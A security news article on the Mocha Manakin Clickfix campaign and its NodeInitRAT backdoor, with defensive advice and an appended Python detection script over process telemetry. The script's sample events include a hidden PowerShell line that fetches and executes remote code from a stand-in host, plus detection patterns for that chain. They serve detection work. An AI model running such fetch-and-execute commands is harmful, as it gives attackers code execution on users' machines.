New Mocha Manakin Malware Deploys NodeInitRAT via Clickfix Attack

A new and concerning cyber threat, dubbed Mocha Manakin, has been identified by cybersecurity research firm Red Canary. First tracked in January 2025, the threat pairs a social-engineering lure that tricks people into running commands with purpose-built malware.

Mocha Manakin uses a deceptive tactic called paste-and-run (also known as Clickfix or fakeCAPTCHA). This method fools computer users into unknowingly copying and running harmful commands, often disguised as steps to fix access to a document or to prove they are human.

These fake instructions bypass regular security checks, making it easy for the malicious script to download further harmful programs onto the victim’s computer. Since August 2024, Red Canary has seen a rise in paste-and-run attacks due to their effectiveness in tricking users.

NodeInitRAT: A Custom-Built Backdoor Leading to Ransomware?

According to the company’s technical blog post, what makes Mocha Manakin different is the custom-made malicious program it delivers: a Node.js-based backdoor called NodeInitRAT. Once a user falls for the paste-and-run trick, a PowerShell command is executed to download a .zip file, which is then saved to the user’s temporary folder, typically C:\Users\<username>\AppData\Local\Temp.

This .zip archive contains a legitimate node.exe program. The PowerShell script then uses this node.exe to run the NodeInitRAT malicious code, passing it directly via the command line.

[Figure: Attack chain (Source: Red Canary)]

Once installed, NodeInitRAT can secretly gather sensitive network information, run any commands it’s given, and deploy more harmful software. This custom backdoor communicates with its controllers over the internet, often using legitimate Cloudflare tunnels to hide its activity.

As of May 2025, Red Canary has not directly seen Mocha Manakin lead to ransomware. However, based on its capabilities and links to Interlock ransomware activity observed by Sekoia.io, Red Canary believes with moderate confidence that unstopped Mocha Manakin infections could likely result in ransomware attacks. This connection is concerning, highlighting the serious potential for data encryption and financial demands.

How to Protect Against Mocha Manakin

Red Canary advises organizations to educate their staff about paste-and-run tactics, teaching them not to follow unexpected instructions that ask them to copy and paste commands into their system. Monitoring for unusual computer behaviours is also crucial. If NodeInitRAT is found, immediately stop active node.exe processes running the malware. The harmful code might also exist in hidden files (like those found in AppData\Roaming) or in Windows Registry entries, which should be deleted to prevent the malware from running again.

For network defence, blocking communication with known harmful domains used by NodeInitRAT can prevent it from connecting with its controllers. Technical teams can also set up detection rules for PowerShell commands that use Invoke-Expression and Invoke-RestMethod, which are typical signs of Mocha Manakin’s initial infection. By staying alert and implementing these protective measures, organizations can significantly reduce their risk from this growing threat.
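The following is an added example, not code from the article or from Red Canary, that turns the attack chain and the detection advice above into rules run over process-creation telemetry. It assumes Sysmon-style fields (image, command line, parent image), assumes the inline Node.js script is passed with node's -e/--eval flag (the article only says "via the command line"), and widens the PowerShell rule to the built-in aliases iex and irm alongside Invoke-Expression and Invoke-RestMethod. The sample events are constructed.

```python
"""Process-creation detections for the Mocha Manakin paste-and-run chain.

Constructed example: the events below are made-up Sysmon-style process-creation
records, and the rule logic illustrates the behaviours the article describes;
it is not Red Canary's published detection content.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the new process
    command_line: str   # its command line
    parent_image: str   # full path of the process that created it


POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# Invoke-Expression / Invoke-RestMethod plus their built-in aliases iex / irm.
IEX_RE = re.compile(r"\b(?:invoke-expression|iex)\b", re.IGNORECASE)
IRM_RE = re.compile(r"\b(?:invoke-restmethod|irm)\b", re.IGNORECASE)

# node's -e / --eval flags take script text on the command line; assumed to be
# how the inline payload is passed (the article only says "via the command line").
NODE_INLINE_RE = re.compile(r"(?:^|\s)(?:-e|--eval)(?:\s|=)")

# User-writable locations named in the article: the per-user Temp folder
# (initial stage) and AppData\Roaming (persistence).
USER_APPDATA_RE = re.compile(
    r"\\users\\[^\\]+\\appdata\\(?:local\\temp|roaming)\\", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_paste_and_run_stager(ev: ProcessEvent) -> bool:
    """PowerShell fetching a remote payload and executing it in one command."""
    return (_basename(ev.image) in POWERSHELL_IMAGES
            and bool(IEX_RE.search(ev.command_line))
            and bool(IRM_RE.search(ev.command_line)))


def rule_node_inline_script_from_appdata(ev: ProcessEvent) -> bool:
    """node.exe running from Temp or Roaming with its script passed inline."""
    return (_basename(ev.image) == "node.exe"
            and bool(USER_APPDATA_RE.search(ev.image))
            and bool(NODE_INLINE_RE.search(ev.command_line)))


def rule_node_spawned_by_powershell(ev: ProcessEvent) -> bool:
    """node.exe whose parent is PowerShell: the hand-off the article describes."""
    return (_basename(ev.image) == "node.exe"
            and _basename(ev.parent_image) in POWERSHELL_IMAGES)


RULES = (
    ("paste_and_run_powershell_stager", rule_paste_and_run_stager),
    ("node_inline_script_from_appdata", rule_node_inline_script_from_appdata),
    ("node_spawned_by_powershell", rule_node_spawned_by_powershell),
)


def evaluate(events) -> list[tuple[str, int]]:
    """Return (rule_name, event_index) for every rule each event matches."""
    hits = []
    for idx, ev in enumerate(events):
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, idx))
    return hits


# Constructed sample events. Index 0 and 1 mimic the chain in the article
# (the user pastes into the Run dialog, so explorer.exe is the parent);
# 2-4 are benign look-alikes that must stay quiet.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iex (irm https://stage.example.invalid/a)"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Users\alice\AppData\Local\Temp\node-v20\node.exe",
                 'node.exe -e "const net=require(\'net\'); /* constructed */"',
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -c "Get-ChildItem C:\\logs"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Program Files\nodejs\node.exe",
                 "node.exe server.js",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -c "irm https://api.example.invalid/health"',
                 r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for name, idx in evaluate(SAMPLE_EVENTS):
        print(f"{name}: event {idx} -> {SAMPLE_EVENTS[idx].command_line}")
```

The first rule requires both cmdlets (or their aliases) in one command line, because a lone Invoke-RestMethod is common in legitimate administration and would be noisy on its own; the node.exe rules key on the two things a developer's install does not do, running from a user's Temp or Roaming folder and being launched by PowerShell with an inline script, so the benign `server.js` run under `C:\Program Files\nodejs` stays silent.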
